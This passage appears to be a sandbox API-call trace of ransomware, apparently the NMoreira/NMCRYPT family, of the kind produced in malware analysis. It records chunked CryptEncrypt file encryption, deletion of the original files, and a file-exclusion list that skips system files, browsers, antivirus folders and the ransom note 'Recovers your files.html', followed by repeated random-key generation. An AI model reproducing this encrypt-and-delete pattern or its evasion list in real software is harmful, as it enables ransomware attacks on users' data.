lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.823] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.823] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.823] GetLastError () returned 0x0 [0145.823] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.823] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.823] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.823] GetLastError () returned 0x0 [0145.824] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.824] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.824] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.824] GetLastError () returned 0x0 [0145.824] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.824] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x20, lpOverlapped=0x0) returned 1 [0145.824] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x20, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x30) returned 1 [0145.824] GetLastError () returned 0x0 [0145.824] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x30, lpOverlapped=0x0) returned 1 [0145.824] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0145.824] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0145.824] CloseHandle (hObject=0x1624) returned 1 [0145.824] CloseHandle (hObject=0x588) returned 1 [0145.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml")) returned 0x20 [0145.825] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml", dwFileAttributes=0x20) returned 0 [0145.825] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 1 [0145.825] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml")) returned 0 [0145.825] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" [0145.825] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0145.826] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAC7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxac7b.tmp")) returned 0xac7b [0145.826] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAC7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxac7b.tmp"), dwFlags=0x1) returned 0 [0145.826] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAC7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxac7b.tmp")) returned 1 [0145.826] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0145.826] wcslen (_String="OK") returned 0x2 [0145.827] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.827] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.827] CryptDestroyKey (hKey=0x9ad638) returned 1 [0145.827] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0145.827] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0145.827] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*NMCRYPT") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*Recovers your files.html") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.exe") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.dll") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.lnk") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.bat") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.ini") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.msi") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*.scf") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*pagefile.sys*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*NTUSER.DAT*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*AppData*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\winrar\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\java\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\windows\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\ESET\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\AVG\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\AVIRA\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*Atheros*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*Realtek*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*bootmgr*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*boot*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*boot*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*CONFIG.SYS*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*IO.SYS*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*MSDOS.SYS*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*NTDETECT.COM*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*ntldr*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*chrome*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*opera*") returned 0 [0145.827] PathMatchSpecW (pszFile="ipschs.xml", pszSpec="*firefox*") returned 0 [0145.828] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml", pszSpec="*") returned 1 [0145.828] strlen (_Str="NMoreira") returned 0x8 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.828] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 